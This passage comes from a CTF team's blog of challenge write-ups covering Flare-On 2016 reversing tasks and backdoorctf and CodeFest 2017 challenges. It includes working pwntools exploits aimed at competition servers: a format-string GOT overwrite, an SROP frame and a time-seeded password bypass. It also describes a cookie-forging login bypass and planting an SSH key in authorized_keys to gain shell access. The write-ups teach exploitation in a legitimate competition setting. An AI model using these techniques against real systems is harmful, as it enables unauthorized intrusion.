Initially when we run the program nothing seems to happen, but by opening it in IDA it is easy to see that it is listening for a TCP connection from localhost on port 2222. It then proceeds to read up to four bytes in sub_401121, of which only the first one will ever be used. At first the disassembly of main looks weird, including undocumented opcodes and kernel mode instructions, alongside with accesses to invalid memory locations. Have a look:

loc_4010A0:
icebp
push    es
sbb     dword ptr [esi], 1F99C4F0h
les     edx, [ecx+1D81061Ch]
out     6, al
and     dword ptr [edx-11h], 0F2638106h
push    es
[...many similar instructions...]
push    es
sub     dword ptr [ebx+6], 6EF6D81h
xor     dword ptr [edx-17h], 7C738106h

If we try to send something via netcat we always seem to get “Nope, that’s not it”. What’s happening behind the scenes is that the first byte received is used as a key in a simple xoradd decryption scheme, where each of the 121 bytes of the weird looking code is first xored with the key and then incremented by 34. Afterwards a 16 bit hash of the decrypted data is calculated and checked against 0xFB5E for equality. If the hash matches, the code is executed, otherwise we get to the same error message as before. We could either run through all 256 possible input bytes by hand, or copy the algorithm and brute force the solution programmatically. I, for obvious time reasons, chose the latter and wrote the following C++ code that quickly gave me 0xA2 as the key:

#include 
#include 

uint8_t data[121] = {0x33, 0xE1, 0xC4, 0x99, 0x11, 0x06, 0x81, 0x16, 0xF0, 0x32, 0x9F,
				0xC4, 0x91, 0x17, 0x06, 0x81, 0x14, 0xF0, 0x06, 0x81, 0x15, 0xF1,
				0xC4, 0x91, 0x1A, 0x06, 0x81, 0x1B, 0xE2, 0x06, 0x81, 0x18, 0xF2,
				0x06, 0x81, 0x19, 0xF1, 0x06, 0x81, 0x1E, 0xF0, 0xC4, 0x99, 0x1F,
				0xC4, 0x91, 0x1C, 0x06, 0x81, 0x1D, 0xE6, 0x06, 0x81, 0x62, 0xEF,
				0x06, 0x81, 0x63, 0xF2, 0x06, 0x81, 0x60, 0xE3, 0xC4, 0x99, 0x61,
				0x06, 0x81, 0x66, 0xBC, 0x06, 0x81, 0x67, 0xE6, 0x06, 0x81, 0x64,
				0xE8, 0x06, 0x81, 0x65, 0x9D, 0x06, 0x81, 0x6A, 0xF2, 0xC4, 0x99,
				0x6B, 0x06, 0x81, 0x68, 0xA9, 0x06, 0x81, 0x69, 0xEF, 0x06, 0x81,
				0x6E, 0xEE, 0x06, 0x81, 0x6F, 0xAE, 0x06, 0x81, 0x6C, 0xE3, 0x06,
				0x81, 0x6D, 0xEF, 0x06, 0x81, 0x72, 0xE9, 0x06, 0x81, 0x73, 0x7C};
uint8_t buf[121];

uint16_t hash()
{
	uint32_t len = 121;
	uint8_t *input = buf;
	uint16_t i = 0;
	uint16_t v3 = 255;
	for(i = 255; len; v3 = (v3 >> 8) + (uint8_t) v3)
	{
		int v6 = len;
		if(len > 20)
			v6 = 20;
		len -= v6;
		do
		{
			i += *input;
			v3 += i;
			++input;
			--v6;
		}
		while(v6);
		i = (i >> 8) + (uint8_t) i;
	}
	return ((i >> 8) + (uint8_t) i) | ((v3 << 8) + (v3 & 0xFF00));
}

int main()
{
	for(uint16_t x = 0; x <= 255; x++)
	{
		uint8_t xorkey = x & 0xFF;
		for(int i = 0; i < 121; i++)
			buf[i] = (data[i] ^ xorkey) + 34;
		if(hash() == 0xFB5E)
			printf("Valid key: %X\n", xorkey);
	}
}

We’re almost done. Put a few breakpoints, debug the program with IDA, netcat the key, decompile the decrypted code and voila’, the flag is in plain sight. It’s quite easy to see that the code puts the flag into the stack before writing out "Congratulations! But wait, where's my flag?":

loc_40107C:
mov     bl, 'e'
mov     [ebp+var_2B], bl
mov     [ebp+var_2A], 't'
mov     dl, '_'
mov     [ebp+var_29], dl
mov     [ebp+var_28], 't'
mov     [ebp+var_27], 'u'
mov     [ebp+var_26], dl
mov     [ebp+var_25], 'b'
mov     [ebp+var_24], 'r'
[...]

The flag that got written to the stack was et_tu_brute_force@flare-on.com

Challenge 4: notepad.exe

“You’re using a VM to run these right?”

For the fourth challenge we once again get an executable, this time what seems to be a modified version of Microsoft’s notepad.exe, which reveals a few oddities when opened in PEid or similar tools. The main point here is that the .rsrc section is marked executable and contains the entry point of the file.

Opening the file in IDA shows that it first of all loads some standard library functions, calls sub_1013F30 and then proceeds to jump to the original notepad code. This function iterates over all the PE executable files contained in %USERPROFILE%\flareon2016challenge\ and modifies them. I used the executable from challenge 2 as a test file, and the only section that got changed was .data, going from the original 644 bytes all the way up to 7680. What seems to happen is that the file copies itself into the .data section of all executables it finds in the directory.

The interesting part still has to come though: when modifying an exe, the file tries to open %USERDATA%\flareon2016challenge\key.bin and either writes an 8 byte sequence or reads a 32 byte key. In particular, it reads 8 byte sequences from specific offsets from exe files that have the following compilation timestamps:

2008/11/10 09:40:34 UTC
2016/08/01 00:00:00 UTC
2016/09/08 18:49:06 UTC
2016/09/09 12:54:16 UTC

These turned out to be four of the files from last year’s challenge, and I finally managed to get to the flag by jumping around with the debugger, since there were more checks that I didn’t want to reverse. By jumping to the right code section each time one of the four files was being worked on by the application I made it write out the right bytes in key.bin and I was finally greeted with a nice MessageBox:

The flag is bl457_fr0m_th3_p457@flare-on.com

Challenge 5: pewpewboat.exe

“You’re doing great. Let’s take a break from all these hard challenges and play a little game.”

For the fifth challenge we get a game. It’s called pewpewboat.exe, but it turns out it actually is an x64 ELF executable for linux. When we run it, it’s one of the simple “shoot all the boats” games, but we quickly find out that the boats really are uppercase letters.

Between each of the levels there was an annoying “NotMD5Hash” minigame, which asked for the hexadecimal of the bitwise negation of the MD5 hash of some 4 character random string. I just edited it out in IDA (for those interested, it’s function sub_403530 and to edit it out I replaced the call instruction that executed it at address 403BE0 with NOPs). Then it was time to run through the game, keeping track of all the letters encountered in the various levels. At the end of level 10, I was prompted with the following message:

Rank: Congratulation!

Aye!PEWYouPEWfoundPEWsomePEWlettersPEWdidPEWya?PEWToPEWfindPEWwhatPEWyou'rePEWlookingPEWfor,PEWyou'llPEWwantPEWtoPEWre-orderPEWthem:PEW9,PEW1,PEW2,PEW7,PEW3,PEW5,PEW6,PEW5,PEW8,PEW0,PEW2,PEW3,PEW5,PEW6,PEW1,PEW4.PEWNextPEWyouPEWletPEW13PEWROTPEWinPEWthePEWsea!PEWTHEPEWFINALPEWSECRETPEWCANPEWBEPEWFOUNDPEWWITHPEWONLYPEWTHEPEWUPPERPEWCASE.
Thanks for playing!

Which, made more readable, becomes:

You found some letters did ya? To find what you're looking for, you'll want to re-order them: 9, 1, 2, 7, 3, 5, 6, 5, 8, 0, 2, 3, 5, 6, 1, 4. Next you let 13 ROT in the sea! THE FINAL SECRET CAN BE FOUND WITH ONLY THE UPPER CASE.

So that’s what I did. I took the 10 letters ("FHGUZREJVO"), reordered them as instructed and run them through ROT13 to get to "BUTWHEREISTHERUM". I still had to figure out what to do with this new key I obtained, so I went back to IDA and found that the code would happily accept a 16 character string instead of a coordinate.

I put my key in and after a few seconds of delay I got the flag: y0u__sUnK_mY__P3Wp3w_b04t@flare-on.com

Turns out that the delay was caused by the code running MD5 2^24 times on the input string before using it to decrypt the flag, presumably to make sure that nobody would just bruteforce the key.

Challenge 6: payload.dll

“I hope you enjoyed your game. I know I did. We will now return to the topic of cyberspace electronic computer hacking and digital software reverse engineering.”

The sixth challenge revolves aroung a 64 bit library, payload.dll, which seemed to contain only one exported function, EntryPoint. But when I tried to run it with rundll32, I encountered the first problem: EntryPoint didn’t seem to be there anymore when the library was loaded.

After loading the dll up in IDA, I found out that it would rewrite its export table at startup so that the exported function was another one, basophileslapsscrapping. The weirdness of the name will become clear soon. So I wrote a small program that would call the function by ordinal, in order not to have any problems with the name:

#include 
#include 

typedef void (*func_t)(long long, long long, long long, long long);

int main()
{
	HINSTANCE dll = LoadLibrary("payload.dll");
	if(!dll) printf("No library?\n");
	else
	{
		func_t fn = (func_t) GetProcAddress(dll, MAKEINTRESOURCE(1));
		if(!fn) printf("NOFUNC???\n");
		else
		{
			fn(0, 0, 0, 0);
		}
	}
}

When I run it all I got was an error message in a MessageBox, so I started going deeper with the disassembler and debugger. What I found was that the new entry point, which I’ll call basophiles from now on, would only do its business if the third parameter actually pointed to its name. And so I did, giving it the address of the string in the new export table:

	fn(0, 0, (long long) fn - 0x5A50 + 0x403D, 0);

Frankly, I didn’t expect much to happen when I run it, so imagine my surprise when this popped up:

I finally had a byte of the flag. Granted, it was probably just one of the ‘o’s in @flare-on.com, but it was something. All I had to do now was finding out the other bytes. I noticed a big chunk of random looking data at the start of the .text section, from which some bytes had become the new export table when I got that first byte, so I started to think that there could be other export tables encrypted in that data. I finally realized that the library was actually choosing which offset to decrypt based on the current timestamp. In particular, it would divide the sum of the current month and year by 26 and take the remainder, which would then be used as the index of the export table to decrypt.

Travelling in time is kind of hard at the moment, so I changed the index in the debugger to decrypt the various pieces, and each time there would be only a single exported function with some random looking name. The curious fact was that the function was always basophiles. the only thing to change was its exported name. What basophiles would do is read the last byte of the export table timestamp and use it to choose a function to decrypt and execute. I was almost there. All I had to do to obtain the remaining bytes of the flag was to run the binary in the debugger, each time putting a different index in the decryption routine and skipping the function name check in basophiles.

In the end, I got my flag: wuuut-exp0rts@flare-on.com

But I couldn’t just stop there. I had to know what all those weird function names were. Turns out, they were just random words:

fillingmeteorsgeminately
leggykickedflutters
incalculabilitycombustionsolvency
crappingrewardsanctity
evolvablepollutantgavial
ammoniatesignifiesshampoo
majesticallyunmarredcoagulate
roommatedecapitateavoider
fiendishlylicentiouslycolouristic
sororityfoxyboatbill
dissimilitudeaggregativewracks
allophoneobservesbashfullness
incuriousfatherlinessmisanthropically
screensassonantprofessionalisms
religionistmightplaythings
airglowexactlyviscount
thonggeotropicermines
gladdingcocottekilotons
diagrammaticallyhotfootsid
corkelettermenheraldically
ulnacontemptuouscaps
impureinternationalisedlaureates
anarchisticbuttonedexhibitionistic
tantalitemimicryslatted
basophileslapsscrapping
orphanedirreproducibleconfidences

Conclusions

Yes, I’m already drawing my conclusions here. After I finished challenge six school started and, while spending a lot of time on challenge seven, I just couldn’t finish it in the time I had. I’m hoping to do better next year, yet I’m satisfied enough for the results I got, this being the first time I participated in the Flare-On competition.

Out of the six challenges I solved, some of the nicest were the last two, with the sixth being slightly evil in its management of export tables. The fourth challenge took a bit more guessing than I was expecting to find the right files, but in the end I enjoyed all of them.

backdoorctf 2017 - dead-png2 Writeup

info@theromanxpl0.it (TRX) — Mon, 25 Sep 2017 00:00:00 +0000

We’re given a file that we’re told is a corrupted png file. Having a first look at it in a hex editor, I couldn’t find any of the normal headers that are normally present in a png file, so I added them back in. I didn’t know much about the png file format, but a quick google search cleared up the missing details for me.

The file is composed of a small header and a number of sections, each having a standard format:

Offset	Description
0	Section size
4	Section name
8	Section data
datalen+12	CRC32 of name+data

What I did is add the header and the mandatory sections, namely IHDR, IDAT and IEND. Since the IDAT section contains the image data I also made sure that the size and CRC32 matched its contents.

All that was left to do was to mess around with the contents of the IHDR section in order to find the right color type, color depth and size of the image. For the color type I uncompressed the original data - it’s zlib - and found out it was in RGBA format, also known as color type 6. The size took a bit or trial and error, but in the end I had a complete png file from which I could read the flag.

Thinking of it now, I could have probably saved a bit of time by importing the raw rgba data in some software, but still, it worked this way and didn’t take long anyways.

backdoorctf 2017 - BABY 0x41414141 Writeup

info@theromanxpl0.it (TRX) — Sun, 24 Sep 2017 00:00:00 +0000

Executing the binary for the first time we have this behaviour:

Ok, cool, decompile it.

This is the main function:

Note: edata is in .bss and it is stdin

Immediatly we see the dumb printf(&format) call. Format string exploit? Yes.

After the vulnerable printf there is a fflush call, so i choose to overwrite its entry in the GOT.

In the functions list we can see the flag(void) function:

Now we must write an exploit to overwrite the fflush entry with the address of flag.

Because the flag address is a really big number i decided to split the format string in two write steps.

Above all we must locate the printf’s parameter index corrispondent to the first 4 bytes of the buffer:

We try AAAA %{INDEX}$p with various indexes, and finally we get that with AAAA %10$p the program prints 0x41414141.

In the exploit we must write the last 2 bytes of the flag’s address to the fflush got entry and the first two bytes to the got entry +2.

Remember that %n writes always 4 bytes.

Adjusting the number of printed chars to fit the flag address we have the exploit.

TADAAA

from pwn import *

flag_func = 0x0804870B
fflush_got = 0x0804A028

off1 = 0x870B - 8 - len("Ok cool, soon we will know whether you pwned it or not. Till then Bye ")
off2 = (0x0804 - 0x870B) & 0xFFFF

format = p32(fflush_got) + p32(fflush_got +2) + "%" + str(off1) + "c%10$n%" + str(off2) + "c%11$n"

#p = process("./32_new")
p = remote("163.172.176.29", 9035)

print p.recvline(False)

p.sendline(format)

print p.readall()

backdoorctf 2017 - ecb Writeup

info@theromanxpl0.it (TRX) — Sun, 24 Sep 2017 00:00:00 +0000

We know that images encypted with an ECB algorithm leave some traces or pattern of the original image ex..

img1

img2

Well those don’t resemble ECB encrypted images, but we are pure hearted and innocent so we decide to believe in the challenge name and description and start playing around with the images in GIMP and Stegosolve.

After some time we start seeing something:

img1

img2

By overlapping the images and tracing over the lines we can more or less read the flag.

backdoorctf 2017 - extend-me Writeup

info@theromanxpl0.it (TRX) — Sun, 24 Sep 2017 00:00:00 +0000

For this challenge we get access to a login prompt. This is the code on the backend, stripped of the useless parts:


key = file('SECRET').read().strip()

@app.route('/login',methods = ['GET', 'POST'])
def login():
	if request.method == 'POST':
		if  not request.form.get('username'):
			return render_template('login.html')
		else:
			username = str(request.form.get('username'))
			if request.cookies.get('data') and request.cookies.get('user'):
				data = str(request.cookies.get('data')).decode('base64').strip()
				user = str(request.cookies.get('user')).decode('base64').strip()
				temp = '|'.join([key,username,user])
				if data != SLHA1(temp).digest():
					temp = SLHA1(temp).digest().encode('base64').strip().replace('\n','')
					resp = make_response(render_template('welcome_new.html',name = username))
					resp.set_cookie('user','user'.encode('base64').strip())
					resp.set_cookie('data',temp)
					return resp
				else:
					if 'admin' in user: # too lazy to check properly :p
						return "Here you go : CTF{XXXXXXXXXXXXXXXXXXXXXXXXX}"
					else:
						return render_template('welcome_back.html',name = username)
			else:
				resp = make_response(render_template('welcome_new.html',name = username))
				temp = '|'.join([key,username,'user'])
				resp.set_cookie('data',SLHA1(temp).digest().encode('base64').strip().replace('\n',''))
				resp.set_cookie('user','user'.encode('base64').strip())
				return resp

	else:
		return render_template('login.html')

It uses the username in the login form and the contents of two cookies, user and data, to authenticate the user, alongside with the contents of file SECRET, which we don’t have access to.

The vulnerable check is after the SLHA1 algorithm - a custom hashing function - is called, since we can force the site to generate the right value for the data cookie for us.

Our goal here is to end up with SLHA1("$SECRET$|admin|admin") in data. To do so we can login a first time to get the cookies, set the contents of the user cookie to YWRtaW4=, the base64 encoding for admin, and login a second time. This time the site will find that the contents of our data cookie are wrong and recalculate them based on our input, so by setting once again the user cookie to YWRtaW4= and logging in a third time we finally get access to the flag.

Remember to login with the same username every time, otherwise the checks on data will fail.

Voilà

Reading other writeups, it seems that the intended solving method was hash extension (as even the challenge’s name seems to suggest), yet I believe this cookie based solution to be much simpler and faster to execute. It also uses as its only tool any web browser that can edit cookies, or in my case Firefox with an extension to do the same.

backdoorctf 2017 - Fun-Signals Writeup

info@theromanxpl0.it (TRX) — Sun, 24 Sep 2017 00:00:00 +0000

This binary has a very small portion of code.

Analize it in IDA:

The first syscall is a read (rax = 0) of 1024 bytes in the stack.

The second is rt_sigreturn.

For a l337 h4xx0r sigreturn means SROP. For me it means Wikipedia.

I learnt that we can control the program flow like with rop using sigreturn and the associated structure on the stack.

This structure contains the context of the signal handler.

So writing this structure on the stack (with read) we have the complete control of all registers.

A good choice is to prepare the registers for a write to the stdout of the flag.

The syscall gadget under int 3 is a perfect target for rip.

Wait, how is composed a signal frame? I don’t know, but pwnlib does.

from pwn import *

context.arch = "amd64"

frame = SigreturnFrame()
frame.rax = constants.SYS_write
frame.rdi = constants.STDOUT_FILENO
frame.rsi = 0x10000023 #flag string address
frame.rdx = 50 #read size
frame.rsp = 0xABADCAFE
frame.rip = 0x10000015 #syscall gadget

#p = process("./player_bin")
p = remote("163.172.176.29", 9034)
p.send(str(frame))

print p.recvall()

backdoorctf 2017 - ImageRev Writeup

info@theromanxpl0.it (TRX) — Sun, 24 Sep 2017 00:00:00 +0000

Looking at the code in encrypt.py we can see that the encryption function works with a pixel at once.

Analyzing the return value it is a tuple of 8 hex strings.

So a pixel is mapped to a 64 bytes hex string.

Now we can print all different pixel types in the encrypted.txt file using a bit of python.

f = open("encrypted.txt")
m = {}

while True:
    s = f.read(64)
    if s == "": break
    m[s] = m.get(s, 0) +1

f.close()

print "                        ENCRYPTED PIXEL                               OCCURRENCES"
print
for e in m:
    print e + "        " + str(m[e])

print

The pixel 709e80c88487a2411e1ee4dfb9f22a861492d20c4765150c0c794abd70f8147c is present 5826 times, so it must be the background.

I choose to associate the background pixels to black and all other pixels to white.

Using pillow we can reconstruct the image to see the flag:

from PIL import Image

f = open("encrypted.txt")
b = ""

while True:
    s = f.read(64)
    if s == "": break
    if s == "709e80c88487a2411e1ee4dfb9f22a861492d20c4765150c0c794abd70f8147c":
        b += chr(0) + chr(0) + chr(0)
    b += chr(255) + chr(255) + chr(255)

f.close()

print len(b)/3

i = Image.frombytes("RGB", (351, 21), b)
i.save("out.png")

Note: the pixels are 7371, before setting the image size (351x21 is good) we tried some times with different sizes.

backdoorctf 2017 - NoCalm Writeup

info@theromanxpl0.it (TRX) — Sun, 24 Sep 2017 00:00:00 +0000

Decompiling the main function we see that each byte of the flag must be passed as argument to the program.

The number of arguments must be 31, as we can see from the first if statement.

The program check the correctness of the flag with a series of nested ifs and arithmetic stuffs.

If the flag is correct, it calls the success function, else it calls fail.

Using angr we can obtain the correct flag effortlessly.

import angr
import claripy
import simuvex
import resource
import time

proj = angr.Project('challenge', load_options={'auto_load_libs' : False})

fail = 0x004007CC
success = 0x004007B6

start = 0x004007E2
avoid = [fail]
end = [success]

argv = []
for i in xrange(31):
    arg = claripy.BVS("input_string" + str(i), 8)
    argv.append(arg)

state = proj.factory.entry_state(args=argv, remove_options={simuvex.o.LAZY_SOLVES,})

pg = proj.factory.path_group(state, veritesting=False)

start_time = time.time()
while len(pg.active) > 0:

    print pg

    pg.explore(avoid=avoid, find=end, n=1)

    if len(pg.found) > 0:
        print
        print "Reached the target"
        print pg
        state = pg.found[0].state

        flag = ""
        for a in argv:
            flag += state.se.any_str(a)[0]
        print "FLAG: " + flag
        break

print
print "Memory usage: " + str(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / 1024) + " MB"
print "Elapsed time: " + str(time.time() - start_time)

CodeFest CTF 2017 - Anonymous Recruitment Writeup

info@theromanxpl0.it (TRX) — Sun, 24 Sep 2017 00:00:00 +0000

This is the page we see when we access the service:

Going through the page cookies, I found this:

I tried to set the flag cookie to False and send the form. As a result, the old form is replaced by the following:

After several tries, I found out that the correct username was root.

I sent the form again:

In the list of cookies, I now see this:

The values of the pass cookie is an md5 hash for the word aunty. I type it as a password, and I find out it’s the flag:

CodeFest CTF 2017 - Lost in Translation Writeup

info@theromanxpl0.it (TRX) — Sat, 23 Sep 2017 00:00:00 +0000

Listening to the file audio you can hear a clock.

Let’s open it with Audacity and check if there’s something.

Apparently nothing.

But zooming in you can notice some irregualrities in the sound waves.

First thing I can think of is morse code

By decoding it we obtain the flag.

-> flag{h014_p33p5}

CodeFest CTF 2017 - Ricks' Secure Scheme Writeup

info@theromanxpl0.it (TRX) — Sat, 23 Sep 2017 00:00:00 +0000

Capture United States - Ricks’ Secure Scheme

The schwifty_service that runs under the port 10987 of the addressed server presents us a menu interface with some options given:

1. Login with the password (*)
2. View the secret contents (#).
3. View the usage logs.
4. Exit.
* => It’s theoretically impossible that you can login
# => Requires login.

To view the secret content we must login first.

At first let’s search the login procedure in IDA Pro. Decompiling the code in the only function called by main, we can find:

So let’s go have a look at sub_400A26

This function looks like a decryption function! We can notice that it initializes the random seed with time() and then xores the first 34 chars of the password with the random value obtained each time with rand().

The decrypted password is then passed to the strncmp function, against the bytes at address 400E60

At that address there are bytes = [0x33, 0x12, 0x46, 0x67, 0xF6, 0x2B, 0x5A, 0x2E, 0x5B, 0x7E, 0xD6, 0xF7, 0xA2, 0x33, 0xD5, 0x7A, 0x87, 0x39, 0x5F, 0x92, 0x73, 0xF5, 0xB1, 0xA5, 0x81, 0xB0, 0x6A, 0x84, 0x38, 0xCD, 0x9B, 0xEA, 0x99, 0xDA] followed by the string 'Welcome to my...\x00'

So how can we pass the check? If we could obtain the same seed and then xor the bytes with the same pseudo-random sequence, then we will have a string, that, when re-xored in the function, will produce the original bytes! Fortunately the time() function has a granularity of 1 second, so we have this whole second to compute the string and pass it to the server.

Let’s make a script:

from pwn import *
import ctypes
import hashlib

libc = ctypes.CDLL("libc.so.6")
passwd = [0x33, 0x12, 0x46, 0x67, 0xF6, 0x2B, 0x5A, 0x2E, 0x5B, 0x7E,
0xD6, 0xF7, 0xA2, 0x33, 0xD5, 0x7A, 0x87, 0x39, 0x5F, 0x92, 0x73, 0xF5,
 0xB1, 0xA5, 0x81, 0xB0, 0x6A, 0x84, 0x38, 0xCD, 0x9B, 0xEA, 0x99, 0xDA]

def genPassword(time):
    libc.srand(time)
    s = ""
    for i in xrange(34):
        s += chr(passwd[i] ^ (libc.rand() % 255))
    return s


s = genPassword(1505768803) + 'Welcome to my...\x00'
print s
quit()


#p = process("./schwifty_service")
p = remote("13.126.83.119",10987)

while True:
    print p.readuntil("Requires login.");

    p.sendline("1")

    print p.readuntil("Enter the password: ");

    s = genPassword(libc.time(0))
    s+= 'Welcome to my...\x00' #REMEMBER TO CONCATENATE THE REST OF THE STRING

    p.sendline(s)
    print "[] password sended", s

    l = p.readline()
    print l

    if l == "I told you you couldn't login!\n":
        continue
    break

p.interactive()

With import ctypes we are sure that we are using the same implementation of rand() as the libc to get the same sequence.

Let’s run it, and… It works!

What?!?!?! How?!!!! Anyway, you've successfully logged in!

Printing the secret will give us an epoch integer, and the md5 of that integer will give us the flag!

flag{c51edda648c6949638488457f32874d6}

CodeFest CTF 2017 - Russia Writeup

info@theromanxpl0.it (TRX) — Sat, 23 Sep 2017 00:00:00 +0000

Private Keys

Reading the source file we understand that the private_key and the public_key are one of the prime numbers generated by valid_primes_sieve(). They are also greater than (d+1)*max_input = 11 * 255.

We can compute the list of all the valid private keys.

    candidates = [prime for prime in valid_primes_sieve().values() if prime > (d+1)*max_input]
    print(len(candidates)) # prints 30

Because private_key and public_key are different, we only need to try 29.

First Step: modular arithmetics

The first step of the encryption algorithm is to compute (priv_key*(d+1)*x)%(pub_key) for each x in the input. In order to reverse this step^[1] we need the modular multiplicative inverse mmi of priv_key*(d+1) modulo pub_key.

We compute an inverse key for each candidate private_key.

    inverse_keys = [mmi(candidate*(d+1), public_key) for candidate in candidates if candidate != public_key]

Second Step: random salt

In the second step a random integer in [1, 3] is added to each value of the cypher text. Since the cypher text is 11 values long, there are only 3¹¹ = 177147 possible combinations, few enough to try them all.


    for s0 in range(1, 4):
        for s1 in range(1, 4):
            ...
            for s10 in range(1, 4):
                reverse([s0, s1, s2, s3, s4, s5, s6, s7, s8, s9, s10])

Where reverse is

def reverse(salt):
    for inverse_key in inverse_keys:
        plain_text = [((inverse_key * (ciphter_text[i] - salt[i])) % public_key) for i in range(len(cipher_text))]
        respects_limits = True
        for value in plain_text:
            respects_limits = respects_limits and (value < 256 and value >= 2)
        if respects_limits:
            print(mmi(inverse_key, pk)/11)

Proof

Let

vk = private_key
ik = inverse_key
pk = public_key

Given that

(vk*(d+1) * ik) % pk = 1 for definition of mmi
(vk*(d+1)*x) * ik % pk = (vk*(d+1)*ik) * x % pk for commutativity of the multiplication

It follows that ((vk*(d+1)*x) * ik) % pk = 1 * x % pk = x % pk

CodeFest CTF 2017 - SimplyBlack Writeup

info@theromanxpl0.it (TRX) — Sat, 23 Sep 2017 00:00:00 +0000

A black image.

By playing around with the brighness and contrast settings in GIMP we can clearly see the secret

-> flag{LETHAL}

CodeFest CTF 2017 - Suzy's Fun Login Writeup

info@theromanxpl0.it (TRX) — Sat, 23 Sep 2017 00:00:00 +0000

Connecting to the remote service we can see that the response is random:

Whats? It’s time to open Ida. In the main function we can see a lot of rubbish, so we locate the interesting function using the Xref of the string Do you want to play? (Y/N?): .

This is the decompiled function:

We can see that the program behaviour is conditionated by the procedure sub_40877C, that supposedly has a side effect on the variable v7.

Analyze them.

Ok, it’s simple, it writes three random numbers in range(0, 3) in the array passed as argument.

Returning to the previous function we see that this three numbers mus be, in order, 0 1 2.

We can brute force it.

Now it’s time to know the content of dest variable, the name of the file in which the program will write our bet.

Viewing the global variable src it is an array of three pointer to the strings /home/suzy, .ssh, authorized_keys.

Ok, now we have all info to solve the challenge.

~/.ssh/authorized_keys is the file in which a server store all authorized public ssh keys, so we must pass an ssh public key as input.

With ssh-keygen -t rsa -b 1024 we generate our key (1024 because fgets read at most 398 bytes).

Now copy the content of the public key (it is like ssh-rsa AAAA...otherbase64chars... yourusername@localhost.localdomain) and try to insert it until you get the response You won the lottery, but were you smart enough to make the right bets?.

Congratulations, you have inserted the key on the server.

Now type in the terminal ssh -i private_key_file suzy@13.126.83.119 (suzy is the remote user that we found hardcoded in the binary).

You are logged in, navigate the filesystem and get your flag.

-> flag{wowyouknowyourexecutables}

CodeFest CTF 2017 - The Eights Writeup

info@theromanxpl0.it (TRX) — Sat, 23 Sep 2017 00:00:00 +0000

Another PNG this time with a black and white squares pattern.

Again a contrast and brightness trick.

This time we encounter a strange pattern. If we think of the pure black parts as 0 and the black and white ones as 1 we get some binary code for each line.

Bin	Hex	ASCII
01010100	0x54	T
01001000	0x48	H
01000101	0x45	E
01000011	0x43	C
01001111	0x4f	O
01000100	0x44	D
01000101	0x45	E
01010010	0x52	R

and it repeats itself.

-> flag{THECODER}

Dump and analysis of exec only binary in Linux

info@theromanxpl0.it (TRX) — Sat, 23 Sep 2017 00:00:00 +0000

#define _GNU_SOURCE
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <libgen.h> //basename

#include <iostream>
#include <string>
#include <fstream>
#include <vector>

using namespace std;

#define BINNAME "noread"


extern "C" int fake_main(int argc, char** argv, char** envp) {

 fstream maps("/proc/self/maps", fstream::in);
 string addrs;
 string nocare;
 string name;

 unsigned long last = (unsigned long)-1;
 vector<string> dumps;
 vector<string> starts;
 vector<string> ends;

 while(maps.good()) {
 maps >> addrs;
 maps >> nocare;
 maps >> nocare;
 maps >> nocare;
 maps >> nocare;
 getline(maps, name);

 if(string(basename((char*)name.c_str())) != BINNAME)
 continue;

 size_t minus = addrs.find("-");
 string start_str = addrs.substr(0, minus);
 string end_str = addrs.substr(minus +1, addrs.size() - minus -1);
 unsigned long start = stol(start_str, 0, 16);
 unsigned long end = stol(end_str, 0, 16);

 if(last == start) {
 dumps.back() += string((char*)start, end - start);
 ends.back() = end_str;
 }
 else {
 dumps.push_back(string((char*)start, end - start));
 starts.push_back(start_str);
 ends.push_back(end_str);
 }
 last = end;
 }

 maps.close();

 for(size_t i = 0; i < dumps.size(); ++i) {
 string outname = BINNAME "-dump-" + starts[i] + "-" + ends[i] + ".bin";
 fstream out(outname, fstream::binary | fstream::out);
 out << dumps[i];
 out.close();

 cout << "dumped: [" << starts[i] << ", " << ends[i] << "]" << endl;
 }

 return 0;
}

//use LD_BIND_NOW LD_PRELOAD

extern "C" int __libc_start_main (int (*main)(int, char**, char**), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) {

 auto functor = (int (*)(int (*) (int, char**, char**), int, char**, void (*) (void), void (*) (void), void (*) (void), void (*)))dlsym(RTLD_NEXT, "__libc_start_main");

 return functor(&fake_main, argc, ubp_av, init, fini, rtld_fini, stack_end);
}

Posts on TheRomanXpl0it

CSAW '25 Embedded Security Challenge Report

TheRomanXpl0it - Qualification report

TheRomanXpl0it - Final report

TFC CTF 25 - Cromozominus Rex

Mucusuki

C-SKY 101

The syscall gadget

The exploit

Cromozominus Rex

The chain

Debugging

Final script

UIUCTF 25 - Damaged SoC

Quick rundown

Decompiling

Time to Rev

1. Prefix check: uiuctf{ (bytes 0..6)

2. Mirror pattern for bytes 7 to 12

3. Stand-alone character checks

4. Tail check: bytes 29..37 must be abcdefghi

5. Central 8+4 byte mixing (bytes 16..23 and 24..27)

Patching it up

Trivia and extras

UIUCTF 25 - Ruler of the Universe

Full diagnostic sweep of the mainframe

Initiating the breach protocol

UIUCTF 25 - Shipping Bay

Unpacking the interplanetary cargo

Resistance is futile

Final script

ALL YOUR FLAGS ARE BELONG TO US

UIUCTF 25 - Supermassive Black Hole

Dissecting the Event‑Horizon Mail Hub

Examining the vulnerability

The payload

Final script

UIUCTF 25 - ELF Capsule

Description

Analysis

Inner binary

Main binary

Decompiler

Final Code

Decompiled Code

Solve

Final Script

Flag

UIUCTF 25 - flag_checker

Description

Analysis

Solve

UIUCTF 25 - nocaml

Overview

Exploitation

UIUCTF 25 - QAS

CornCTF 2025 - phpislovephpislife 3

Overview

How does this work exactly

Exploitation phase

L3akCTF 2025 - Certay

Examining the vulnerability

The exploit

Putting it all together

TRX CTF 25 - Baby Sandbox

Overview

Final Exploit

TRX CTF 25 - Baby Small

Description

Challenge overview

Exploitation

Lore moment

Back to exploitation

Full exploit

TRX CTF 25 - babyDLP

Recovering d

Recovering the Flag

Overview on our solution

TRX CTF 25 - Brainrot

The Given Equations

1. Prefix check: `uiuctf{` (bytes 0..6)

4. Tail check: bytes 29..37 must be `abcdefghi`

Recovering `d`